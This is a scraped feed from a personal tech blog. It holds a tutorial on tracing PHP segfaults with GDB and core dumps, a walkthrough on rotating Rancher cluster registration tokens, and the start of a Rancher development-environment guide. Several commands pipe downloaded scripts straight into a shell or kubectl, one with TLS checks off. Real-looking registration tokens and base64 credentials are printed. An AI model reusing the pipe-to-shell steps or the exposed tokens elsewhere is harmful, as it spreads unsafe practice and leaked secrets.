Images in Pok&#xE9;mon Yellow only use four colours: black, white, colour one shade one and colour one shade two. With the help of photoshop greyscale bitmap inverted images, my friends came alive in the game I loved.</p><figure class="kg-card kg-video-card kg-card-hascaption"><div class="kg-video-container"><video src="https://fe.ax/content/media/2022/02/2020-05-17_00-12-14_Trim.mp4" poster="https://img.spacergif.org/v1/482x402/0a/spacer.png" width="482" height="402" loop autoplay muted playsinline preload="metadata" style="background: transparent url(&apos;https://fe.ax/content/images/2022/02/media-thumbnail-ember189.jpg&apos;) 50% 50% / cover no-repeat;"></video><div class="kg-video-overlay"><button class="kg-video-large-play-icon"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M23.14 10.608 2.253.164A1.559 1.559 0 0 0 0 1.557v20.887a1.558 1.558 0 0 0 2.253 1.392L23.14 13.393a1.557 1.557 0 0 0 0-2.785Z"/></svg></button></div><div class="kg-video-player-container kg-video-hide"><div class="kg-video-player"><button class="kg-video-play-icon"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M23.14 10.608 2.253.164A1.559 1.559 0 0 0 0 1.557v20.887a1.558 1.558 0 0 0 2.253 1.392L23.14 13.393a1.557 1.557 0 0 0 0-2.785Z"/></svg></button><button class="kg-video-pause-icon kg-video-hide"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><rect x="3" y="1" width="7" height="22" rx="1.5" ry="1.5"/><rect x="14" y="1" width="7" height="22" rx="1.5" ry="1.5"/></svg></button><span class="kg-video-current-time">0:00</span><div class="kg-video-time">/<span class="kg-video-duration"></span></div><input type="range" class="kg-video-seek-slider" max="100" value="0"><button class="kg-video-playback-rate">1&#xD7;</button><button class="kg-video-unmute-icon"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M15.189 2.021a9.728 9.728 0 0 0-7.924 4.85.249.249 0 0 1-.221.133H5.25a3 3 0 0 0-3 3v2a3 3 0 0 0 3 3h1.794a.249.249 0 0 1 .221.133 9.73 9.73 0 0 0 7.924 4.85h.06a1 1 0 0 0 1-1V3.02a1 1 0 0 0-1.06-.998Z"/></svg></button><button class="kg-video-mute-icon kg-video-hide"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M16.177 4.3a.248.248 0 0 0 .073-.176v-1.1a1 1 0 0 0-1.061-1 9.728 9.728 0 0 0-7.924 4.85.249.249 0 0 1-.221.133H5.25a3 3 0 0 0-3 3v2a3 3 0 0 0 3 3h.114a.251.251 0 0 0 .177-.073ZM23.707 1.706A1 1 0 0 0 22.293.292l-22 22a1 1 0 0 0 0 1.414l.009.009a1 1 0 0 0 1.405-.009l6.63-6.631A.251.251 0 0 1 8.515 17a.245.245 0 0 1 .177.075 10.081 10.081 0 0 0 6.5 2.92 1 1 0 0 0 1.061-1V9.266a.247.247 0 0 1 .073-.176Z"/></svg></button><input type="range" class="kg-video-volume-slider" max="100" value="100"></div></div></div><figcaption>Adding a friend to the game</figcaption></figure><p>That&apos;s it for this journey. I wished I still had the changed assembly parts to share, but sadly I&apos;ve lost all of it due to data loss shortly after writing the extended version of this blog post.</p>]]></content:encoded></item><item><title><![CDATA[Finding (performance) issues in PHP using GDB]]></title><description><![CDATA[When a web request hangs, but you can't figure out how to find the culprit? With GDB, you can analyze PHP requests in more detail than you think.]]></description><link>https://fe.ax/checking-performance-problems-in-php-using-gdb/</link><guid isPermaLink="false">62aa367b094121017a6b4011</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Thu, 10 Feb 2022 21:42:55 GMT</pubDate><content:encoded><![CDATA[<p>Has it ever happened to you when a specific web request keeps loading and loading? Can&apos;t figure out where the code is crashing into a segfault? Say no more. You can use a tool called GDB for various complex things. It&apos;s a debugger for binary applications which can do a lot more, and we&apos;re just going to scratch the surface in one specific way. A way that unveils the exact functions, lines and parameters it&apos;s running.</p><p>When a web request caused PHP to segfault, I figured I could ask the kernel to make a core dump and read the backtrace whenever this happens.</p><p>Let&apos;s set up an environment to test core dumping on segfaults.</p><figure class="kg-card kg-code-card"><pre><code class="language-Dockerfile">FROM ubuntu:20.04

RUN apt-get update &amp;&amp; \
    apt-get install nano gdb ubuntu-dbgsym-keyring php-cli -y

RUN  printf &quot;deb http://ddebs.ubuntu.com focal main restricted universe multiverse\ndeb http://ddebs.ubuntu.com focal-updates main restricted universe multiverse\ndeb http://ddebs.ubuntu.com focal-proposed main restricted universe multiverse&quot; &gt; /etc/apt/sources.list.d/ddebs.list

RUN apt-get update &amp;&amp; \
    apt-get install libargon2-1-dbgsym libc6-dbg libgcc-s1-dbgsym libicu66-dbgsym liblzma5-dbgsym libpcre2-8-0-dbgsym libsodium23-dbgsym libssl1.1-dbgsym libstdc++6-dbgsym libxml2-dbgsym php7.4-cli-dbgsym zlib1g-dbgsym nano -y
</code></pre><figcaption>Dockerfile for testing env</figcaption></figure><p>Start it up.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@pc:~# docker build . -t coredumps:latest
...
root@pc:~# mkdir /coredumps
root@pc:~# docker run \
  --rm -it \
  --ulimit core=-1 \
  -v /coredumps:/coredumps \
  coredumps:latest
root@ee967362b789:/# cd</code></pre><figcaption>Running a container with core dumps enabled.</figcaption></figure><p>Now create a PHP script where a loop will trigger the segfault.</p><figure class="kg-card kg-code-card"><pre><code class="language-PHP">&lt;?php

function make() {
    it();
}

Class TestMe {
    public function __tostring() {
        return &quot;&quot;.$this;
    }
}

function it() {
    jump();
}

function jump() {
    (string) new TestMe();
}

make();
</code></pre><figcaption>Segfaulting PHP code (Inspired by <a href="https://jolicode.com/blog/find-segfaults-in-php-like-a-boss">jolicode</a>)</figcaption></figure><p>Run it, and you&apos;ll see a segfault:</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# php index.php
Segmentation fault
</code></pre><figcaption>Segfaulting</figcaption></figure><p>Now let&apos;s make it dump its core! For the container to make a core dump, you&apos;ll need to change the host, and it&apos;ll also save the core dump on the host. Be sure to check if you started the container with --ulimit core=-1.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@pc:~# echo &apos;/coredumps/core.%e.%p&apos; &gt; /proc/sys/kernel/core_pattern
</code></pre><figcaption>Enabling and sending core dumps to a directory</figcaption></figure><p>When rerunning the PHP code, the output has changed.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:~# php crash.php
Segmentation fault (core dumped)
root@ee967362b789:/# ls /coredumps/
core.php.13
</code></pre><figcaption>Creating a core dump</figcaption></figure><p>Let&apos;s load it up in GDB!</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# gdb php /coredumps/core.php.13
....
....
(gdb) bt
#0  zend_call_method (object=0x7f64cef39770, obj_ce=&lt;optimized out&gt;, obj_ce@entry=0x7f64cee03100, fn_proxy=fn_proxy@entry=0x7f64cee03238, function_name=function_name@entry=0x555c2e7922ba &quot;__tostring&quot;,
    function_name_len=function_name_len@entry=10, retval_ptr=retval_ptr@entry=0x7ffd05a45100, param_count=0, arg1=0x0, arg2=0x0) at ./Zend/zend_interfaces.c:103
#1  0x0000555c2e6e02cd in zend_std_cast_object_tostring (readobj=&lt;optimized out&gt;, writeobj=0x7ffd05a45150, type=&lt;optimized out&gt;) at ./Zend/zend_object_handlers.c:1799
#2  0x0000555c2e6a54fe in __zval_get_string_func (try=0 &apos;\000&apos;, op=0x7f64cef39770) at ./Zend/zend_operators.c:895
#3  zval_get_string_func (op=&lt;optimized out&gt;) at ./Zend/zend_operators.c:925
#4  0x0000555c2e6a592d in concat_function (result=0x7f64cef39780, op1=&lt;optimized out&gt;, op2=op2@entry=0x7f64cef39770) at ./Zend/zend_operators.c:1852
#5  0x0000555c2e6f4e62 in ZEND_CONCAT_SPEC_CONST_TMPVAR_HANDLER () at ./Zend/zend_vm_execute.h:7480
#6  0x0000555c2e72fa7f in execute_ex (ex=0x7ffd05a45030) at ./Zend/zend_vm_execute.h:54491
#7  0x0000555c2e69f75f in zend_call_function (fci=fci@entry=0x7ffd05a45400, fci_cache=0x7f64cee8d0c0, fci_cache@entry=0x7ffd05a453e0) at ./Zend/zend_execute_API.c:812
#8  0x0000555c2e6ca66c in zend_call_method (object=0x7f64cef39700, obj_ce=&lt;optimized out&gt;, obj_ce@entry=0x7f64cee03100, fn_proxy=fn_proxy@entry=0x7f64cee03238,
    function_name=function_name@entry=0x555c2e7922ba &quot;__tostring&quot;, function_name_len=function_name_len@entry=10, retval_ptr=retval_ptr@entry=0x7ffd05a454d0, param_count=0, arg1=0x0, arg2=0x0)
    at ./Zend/zend_interfaces.c:103
    </code></pre><figcaption>Backtrace of the PHP process</figcaption></figure><p>Right now, it&apos;s hard to make sense of this backtrace. Let&apos;s load up the gdb init file from the PHP people, making it a lot more readable. (<a href="https://github.com/php/php-src/blob/PHP-7.4.27/.gdbinit">grab it from here</a>)</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# nano ~/.gdbinit
root@ee967362b789:/# gdb php /coredumps/core.php.13
....
....
(gdb) zbacktrace
[0x7f64cef39720] TestMe-&gt;__tostring() /crash.php:9
[0x7ffd05a45340] ???
[0x7f64cef396b0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffd05a45710] ???
[0x7f64cef39640] TestMe-&gt;__tostring() /crash.php:9
...
... Goes brrrr
...
[0x7f64cee131c0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffd0623ecc0] ???
[0x7f64cee13140] jump() /crash.php:18
[0x7f64cee130e0] it() /crash.php:14
[0x7f64cee13080] make() /crash.php:4
[0x7f64cee13020] (main) /crash.php:21
</code></pre><figcaption>gdb init file from PHP</figcaption></figure><p>That&apos;s more like it. Now we can see it&apos;s crashing on line 9 of the PHP file we created. We can also directly jump into GDB to overcome the need for a core dump file.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# gdb --args php crash.php
...
...
(gdb) run
Starting program: /usr/bin/php crash.php
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library &quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;.

Program received signal SIGSEGV, Segmentation fault.
0x0000560043641265 in zend_call_function (fci=fci@entry=0x7ffc0d9c80f0, fci_cache=fci_cache@entry=0x7ffc0d9c80d0) at ./Zend/zend_execute_API.c:677
677     ./Zend/zend_execute_API.c: No such file or directory.
(gdb) zbacktrace
[0x7f39071398e0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffc0d9c8400] ???
[0x7f3907139870] TestMe-&gt;__tostring() /crash.php:9
[0x7ffc0d9c87d0] ???
[0x7f3907139800] TestMe-&gt;__tostring() /crash.php:9
...
... Goes brrrr again
...
[0x7f39071396b0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffc0e1c2cc0] ???
[0x7f3907013140] jump() /crash.php:18
[0x7f39070130e0] it() /crash.php:14
[0x7f3907013080] make() /crash.php:4
[0x7f3907013020] (main) /crash.php:21
</code></pre><figcaption>Directly run in GDB</figcaption></figure><p>If there is a need for $_SERVER variables, then add the following wrapper script:</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">#!/bin/bash

export REQUEST_URI=/myuri
export SERVER_NAME=www.example.com
export HTTP_HOST=www.example.com
export DOCUMENT_ROOT=/
export DOCUMENT_URI=/myuri
export SCRIPT_NAME=/myuri
export REQUEST_METHOD=GET
export HTTP_X_FORWARDED_PROTO=https
export REQUEST_SCHEME=https

gdb --args php crash.php</code></pre><figcaption>Fake CGI request</figcaption></figure><p>If the process is already running, you can use <em><strong>gcore</strong></em> to dump the core and check what it was doing.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# php crash.php &amp;
[1] 55
root@ee967362b789:/# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4248  3576 pts/0    Ss   20:52   0:00 bash
root        37  0.3  0.0   4248  3344 pts/1    Ss   21:18   0:00 /bin/bash
root        45  0.0  0.0   5900  2904 pts/1    R+   21:18   0:00 ps aux
root        55  0.0  0.0  58940 17076 pts/0    S+   21:17   0:00 php crash.php
root@ee967362b789:/# gcore 55
...
Saved corefile core.55
[Inferior 1 (process 55) detached]
root@ee967362b789:/# gdb php ./core.55
...
...
(gdb) zbacktrace
[0x7f14d7c130f0] sleep(60) [internal function]
[0x7f14d7c13080] make() /crash.php:4
[0x7f14d7c13020] (main) /crash.php:22
root@ee967362b789:/# cat -n crash.php
     1  &lt;?php
     2
     3  function make() {
     4      sleep(60);
     5      it();
     6  }
     7
     8  Class TestMe {
     9      public function __tostring() {
    10          return &quot;&quot;.$this;
    11      }
    12  }
    13
    14  function it() {
    15      jump();
    16  }
    17
    18  function jump() {
    19      (string) new TestMe();
    20  }
    21
    22  make();
</code></pre><figcaption>GDB with gcore dumps</figcaption></figure><p>We can see it&apos;s currently sleeping on line 4 of the PHP file. </p>]]></content:encoded></item><item><title><![CDATA[Refreshing the Rancher cluster registration token]]></title><description><![CDATA[<p>There may be a time when you&apos;ll want to refresh the &quot;clusterregistrationtoken&quot; or CRT for short. You can&apos;t do this in Rancher, as far as I know.</p><p>First, let&apos;s see where this token is saved.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.</code></pre></figure>]]></description><link>https://fe.ax/refreshing-clusterregistrationtoken/</link><guid isPermaLink="false">62aa367b094121017a6b400e</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sat, 22 Jan 2022 17:14:36 GMT</pubDate><content:encoded><![CDATA[<p>There may be a time when you&apos;ll want to refresh the &quot;clusterregistrationtoken&quot; or CRT for short. You can&apos;t do this in Rancher, as far as I know.</p><p>First, let&apos;s see where this token is saved.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -A
NAMESPACE   NAME            AGE
local       default-token   6d16h</code></pre><figcaption>CRT&apos;s without extra cluster&#xA0;</figcaption></figure><p>Only the local cluster token is available right now.</p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">apiVersion: management.cattle.io/v3
kind: ClusterRegistrationToken
metadata:
  creationTimestamp: &quot;2022-01-15T20:33:33Z&quot;
  generation: 3
  name: default-token
  namespace: local
  resourceVersion: &quot;6746&quot;
  uid: 6b444468-6fd1-44a0-b862-331056a88c4d
spec:
  clusterName: local
status:
  command: kubectl apply -f https://rancher.fe.ax/v3/import/xxxxx_local.yaml
  insecureCommand: curl --insecure -sfL https://rancher.fe.ax/v3/import/xxxxx_local.yaml
    | kubectl apply -f -
  insecureNodeCommand: &quot;&quot;
  insecureWindowsNodeCommand: &quot;&quot;
  manifestUrl: https://rancher.fe.ax/v3/import/xxxxx_local.yaml
  nodeCommand: sudo docker run -d --privileged --restart=unless-stopped --net=host
    -v /etc/kubernetes:/etc/kubernetes -v /var/run:/var/run  rancher/rancher-agent:576d32a06
    --server https://rancher.fe.ax --token xxxxxxx
    --ca-checksum xxxxxxx
  token: xxxxxxx
  windowsNodeCommand: PowerShell -NoLogo -NonInteractive -Command &quot;&amp; {docker run -v
    c:\:c:\host rancher/rancher-agent:576d32a06 bootstrap --server https://rancher.fe.ax
    --token xxxxxxx --ca-checksum xxxxxxx
    | iex}&quot;
</code></pre><figcaption>CRT of local</figcaption></figure><p>Let&apos;s add another cluster. Once we complete the custom cluster creation wizard in Rancher&apos;s cluster management, we can see a new namespace created with a unique cluster-ID.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get ns
NAME                                     STATUS   AGE
local                                    Active   6d16h
p-rghcj                                  Active   6d16h
cattle-global-data                       Active   6d16h
p-k5j5m                                  Active   6d16h
kube-node-lease                          Active   6d17h
fleet-default                            Active   6d16h
default                                  Active   6d17h
kube-public                              Active   6d17h
cattle-impersonation-system              Active   6d16h
cattle-system                            Active   6d16h
cert-manager                             Active   6d16h
kube-system                              Active   6d17h
cattle-global-nt                         Active   6d16h
cattle-fleet-system                      Active   6d16h
cattle-fleet-clusters-system             Active   6d16h
fleet-local                              Active   6d16h
cluster-fleet-local-local-1a3d67d0a899   Active   6d16h
cattle-fleet-local-system                Active   6d16h
user-zd4f7                               Active   6d16h
c-75snr                                  Active   43m
p-skphs                                  Active   43m
p-phkbr                                  Active   43m</code></pre><figcaption>List of namespaces</figcaption></figure><p>Here we&apos;re checking out the CRT&apos;s after cluster creation.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -A
NAMESPACE   NAME            AGE
local       default-token   6d16h
c-75snr     default-token   46m
c-75snr     crt-zztbw       46m
</code></pre><figcaption>CRT list after cluster creation</figcaption></figure><p>We can get the join command from crt-zztbw. Why it&apos;s creating a separate token is unknown to me. </p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">apiVersion: management.cattle.io/v3
kind: ClusterRegistrationToken
metadata:
  annotations:
    field.cattle.io/creatorId: user-zd4f7
  creationTimestamp: &quot;2022-01-22T12:32:57Z&quot;
  generateName: crt-
  generation: 2
  labels:
    cattle.io/creator: norman
  name: crt-zztbw
  namespace: c-75snr
  resourceVersion: &quot;1753365&quot;
  uid: d8bee26d-4f62-4743-90e2-4cce25f745f2
spec:
  clusterName: c-75snr
status:
  command: kubectl apply -f https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
  insecureCommand: curl --insecure -sfL https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
    | kubectl apply -f -
  insecureNodeCommand: &quot;&quot;
  insecureWindowsNodeCommand: &quot;&quot;
  manifestUrl: https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
  nodeCommand: sudo docker run -d --privileged --restart=unless-stopped --net=host
    -v /etc/kubernetes:/etc/kubernetes -v /var/run:/var/run  rancher/rancher-agent:576d32a06
    --server https://rancher.fe.ax --token jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
    --ca-checksum f37e412eaa6ed8f643af2cddeef25790eee501a6ec6b8578309059dd07f3ca37
  token: jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
  windowsNodeCommand: PowerShell -NoLogo -NonInteractive -Command &quot;&amp; {docker run -v
    c:\:c:\host rancher/rancher-agent:576d32a06 bootstrap --server https://rancher.fe.ax
    --token jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2 --ca-checksum f37e412eaa6ed8f643af2cddeef25790eee501a6ec6b8578309059dd07f3ca37
    | iex}&quot;</code></pre><figcaption>The new cluster registration token</figcaption></figure><p>Let Rancher provision the cluster for a while.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-2.png" class="kg-image" alt loading="lazy" width="677" height="306" srcset="https://fe.ax/content/images/size/w600/2022/01/image-2.png 600w, https://fe.ax/content/images/2022/01/image-2.png 677w"><figcaption>Cluster provisioning</figcaption></figure><p>After the cluster is provisioned, you can check the secrets for cattle credentials in the new cluster.</p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">apiVersion: v1
data:
  namespace: Yy03NXNucg==
  token: cWpyZHE1OWQ3OGdtYnpscXA1dmt2enRjbnB0cm00ZDc4cjdxc3hycjl3dzVkOGxybHg4eHB3
  url: aHR0cHM6Ly9yYW5jaGVyLmZlLmF4
kind: Secret
metadata:
  annotations:
    field.cattle.io/projectId: c-75snr:p-phkbr
    kubectl.kubernetes.io/last-applied-configuration: |
      {&quot;apiVersion&quot;:&quot;v1&quot;,&quot;data&quot;:{&quot;namespace&quot;:&quot;Yy03NXNucg==&quot;,&quot;token&quot;:&quot;cWpyZHE1OWQ3OGdtYnpscXA1dmt2enRjbnB0cm00ZDc4cjdxc3hycjl3dzVkOGxybHg4eHB3&quot;,&quot;url&quot;:&quot;aHR0cHM6Ly9yYW5jaGVyLmZlLmF4&quot;},&quot;kind&quot;:&quot;Secret&quot;,&quot;metadata&quot;:{&quot;annotations&quot;:{},&quot;name&quot;:&quot;cattle-credentials-f945d4e&quot;,&quot;namespace&quot;:&quot;cattle-system&quot;},&quot;type&quot;:&quot;Opaque&quot;}
  creationTimestamp: &quot;2022-01-22T14:07:37Z&quot;
  managedFields:
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:data:
        .: {}
        f:namespace: {}
        f:token: {}
        f:url: {}
      f:metadata:
        f:annotations:
          .: {}
          f:kubectl.kubernetes.io/last-applied-configuration: {}
      f:type: {}
    manager: kubectl-client-side-apply
    operation: Update
    time: &quot;2022-01-22T14:07:37Z&quot;
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:annotations:
          f:field.cattle.io/projectId: {}
    manager: agent
    operation: Update
    time: &quot;2022-01-22T16:31:53Z&quot;
  name: cattle-credentials-f945d4e
  namespace: cattle-system
  resourceVersion: &quot;13094&quot;
  uid: 88f3edc0-088a-49cc-87eb-bd1ca80f4f55
type: Opaque</code></pre><figcaption>Cattle credentials</figcaption></figure><p>Now let&apos;s look at the part where I posted my credentials online, on a blog, for example, and want to invalidate that token.</p><p>I can remove the current CRT, which Fleet will regenerate. In this case, I remove all of them from the local (old) cluster.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl delete clusterregistrationtoken.management.cattle.io -n c-75snr crt-zztbw
clusterregistrationtoken.management.cattle.io &quot;crt-zztbw&quot; deleted
marco@cp1:~$ kubectl delete clusterregistrationtoken.management.cattle.io -n c-75snr default-token
clusterregistrationtoken.management.cattle.io &quot;default-token&quot; deleted
</code></pre><figcaption>Deleting CRT&apos;s</figcaption></figure><p>After which, Fleet adds a new one when we open up the registration page in Rancher.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-3.png" class="kg-image" alt loading="lazy" width="1149" height="751" srcset="https://fe.ax/content/images/size/w600/2022/01/image-3.png 600w, https://fe.ax/content/images/size/w1000/2022/01/image-3.png 1000w, https://fe.ax/content/images/2022/01/image-3.png 1149w" sizes="(min-width: 720px) 720px"><figcaption>Cluster registration page</figcaption></figure><p>The new token is visible in the local cluster.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -n c-75snr
NAME            AGE
crt-zpbl6       4m5s
default-token   3m5s</code></pre><figcaption>CRT&apos;s are recreated by Rancher&apos;s Fleet</figcaption></figure><p>To efficiently show the tokens, we can use custom columns.</p><pre><code class="language-shell">kubectl get clusterregistrationtoken.management.cattle.io -n c-75snr -o custom-columns=NAME:.metadata.name,TOKEN:.status.token
NAME            TOKEN
crt-zpbl6       k8zvqgbwdcg5cpbp9jnckb9g6m8z4555vqk79f7vzgpnd94clws2w4
default-token   jntphjz86wl7w7jh624pfchvhnrzgvhdtn26bwnhwfml8rtk4rsnrh</code></pre><p>While the old CRT is invalidated, the &quot;testcrt&quot; cluster is still connected. When we reboot the cluster, the following happens.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-4.png" class="kg-image" alt loading="lazy" width="604" height="349" srcset="https://fe.ax/content/images/size/w600/2022/01/image-4.png 600w, https://fe.ax/content/images/2022/01/image-4.png 604w"><figcaption>testcrt cluster is unable to connect due to token mismatch</figcaption></figure><p>In the cattle-agent pod, the following logs appear.</p><figure class="kg-card kg-code-card"><pre><code class="language-text">time=&quot;2022-01-22T17:02:04Z&quot; level=info msg=&quot;Connecting to wss://rancher.fe.ax/v3/connect/register with token starting with qjrdq59d78gmbzlqp5vkvztcnpt&quot;
time=&quot;2022-01-22T17:02:04Z&quot; level=info msg=&quot;Connecting to proxy&quot; url=&quot;wss://rancher.fe.ax/v3/connect/register&quot;
time=&quot;2022-01-22T17:02:04Z&quot; level=error msg=&quot;Failed to connect to proxy. Response status: 400 - 400 Bad Request. Response body: cluster not found&quot; error=&quot;websocket: bad handshake&quot;
time=&quot;2022-01-22T17:02:04Z&quot; level=error msg=&quot;Remotedialer proxy error&quot; error=&quot;websocket: bad handshake&quot;</code></pre><figcaption>Cattle agent log</figcaption></figure><p>We now need to patch the credentials secret. Be sure to encode the token with base64, and the encoded string is not ending in Cg==, which means &quot;newline&quot;.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">root@cp2:~# kubectl \
  --cluster=&apos;testcrt-cp2&apos; \
  -n cattle-system patch secret cattle-credentials-f945d4e \
  --type=&apos;json&apos; \
  -p=&apos;[{&quot;op&quot; : &quot;replace&quot; ,&quot;path&quot; : &quot;/data/token&quot; ,&quot;value&quot; : &quot;azh6dnFnYndkY2c1Y3BicDlqbmNrYjlnNm04ejQ
1NTV2cWs3OWY3dnpncG5kOTRjbHdzMnc0&quot;}]&apos;
secret/cattle-credentials-f945d4e patched
</code></pre><figcaption>Patching the new token</figcaption></figure><p>After the secret is patched, we need to redeploy the cattle agent to reload the token.</p><pre><code class="language-shell">root@cp2:~# kubectl --cluster=&apos;testcrt-cp2&apos; rollout restart deployment -n cattle-system cattle-cluster-agent
deployment.apps/cattle-cluster-agent restarted</code></pre><p>Once cattle agent is restarted, we&apos;ll see it&apos;s available in Rancher dashboard again.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-5.png" class="kg-image" alt loading="lazy" width="623" height="377" srcset="https://fe.ax/content/images/size/w600/2022/01/image-5.png 600w, https://fe.ax/content/images/2022/01/image-5.png 623w"><figcaption>testcrt is back online</figcaption></figure>]]></content:encoded></item><item><title><![CDATA[Setting up a development version of Rancher]]></title><description><![CDATA[<p>After encountering a minor issue with Rancher&apos;s latest version, I decided to check if I could find more information about this problem by digging in the source code, adding some logging to the areas around the relevant parts. To start investigating this issue, I needed a testing environment</p>]]></description><link>https://fe.ax/rancher-development-environment/</link><guid isPermaLink="false">62aa367b094121017a6b400d</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sat, 15 Jan 2022 20:48:34 GMT</pubDate><content:encoded><![CDATA[<p>After encountering a minor issue with Rancher&apos;s latest version, I decided to check if I could find more information about this problem by digging in the source code, adding some logging to the areas around the relevant parts. To start investigating this issue, I needed a testing environment that hopefully also shows this issue.</p><p>First, we need a machine to build and run Rancher. You can use a VirtualBox VM or some VPS online installed with Ubuntu 20.04.</p><p>There are a few prerequisites before you&apos;re able to build Rancher. For one, we need to install Docker, and we can do so by using Rancher&apos;s docker install script or any other way you&apos;d prefer.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">curl https://releases.rancher.com/install-docker/20.10.sh | sh</code></pre><figcaption>Installing Docker</figcaption></figure><p>Once that&apos;s installed, we&apos;ll need to set up a Kubernetes cluster. To make it easy, we&apos;ll use Rancher&apos;s lightweight Kubernetes distribution called K3s. We&apos;re using the docker engine to enable the use of docker images. K3s uses CRI-O by default, which doesn&apos;t use the images loaded into Docker by the build process later on.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">curl -sfL https://get.k3s.io | sudo sh -s - --docker
sudo systemctl start k3s
sudo k3s kubectl get node</code></pre><figcaption>Install single node K3s</figcaption></figure><p>Once it&apos;s up and running showing a &quot;Ready&quot; node, we should install Kubectl for convenience.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell"># Note that this command downloads the matching client version
curl -LO &quot;https://dl.k8s.io/release/$(k3s kubectl version --short=true | awk -F&apos;[ +]&apos; &apos;{print $(NF-1); exit}&apos;)/bin/linux/amd64/kubectl&quot;
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
rm -f kubectl
mkdir ~/.kube
sudo cat /etc/rancher/k3s/k3s.yaml &gt; ~/.kube/config
chmod -R 600 ~/.kube/config
kubectl version
# Following lines are to enable bash completion
source &lt;(kubectl completion bash) # setup autocomplete in bash into the current shell, bash-completion package should be installed first.
echo &quot;source &lt;(kubectl completion bash)&quot; &gt;&gt; ~/.bashrc # add autocomplete permanently to your bash shell.
kubectl get nodes</code></pre><figcaption>Installing kubectl and copying the kubeconfig</figcaption></figure><p>Once that&apos;s up and running, let&apos;s install HELM to deploy the Rancher generated HELM package once we&apos;ve created our develop build. We&apos;re living on the edge, so this will be easy.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash</code></pre><figcaption>Installing HELM</figcaption></figure><p>We&apos;ll also need to use Docker directly. If you are using a regular user, you&apos;ll have to allow access to Docker by adding the user to the &quot;docker&quot; group.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">sudo usermod -aG docker marco
# Restart session to reload privileges</code></pre><figcaption>Giving user privileges to Docker</figcaption></figure><p>Now we&apos;ve set that up, we need to grab the source code and build it. We start by cloning the Rancher source code from their <a href="https://github.com/rancher/rancher">GitHub</a>.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">sudo apt install git make
# Make sure you are using the version tag you want
git clone https://github.com/rancher/rancher.git -b v2.6.3</code></pre><figcaption>Cloning Rancher</figcaption></figure><p>After we&apos;ve cloned the source code, we can jump into building it. First, we&apos;ll remove the test step from the ci scripts; making Rancher build a lot quicker. You can also temporarily remove the validate step if you want it to be even quicker.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">cd rancher
nano scripts/ci
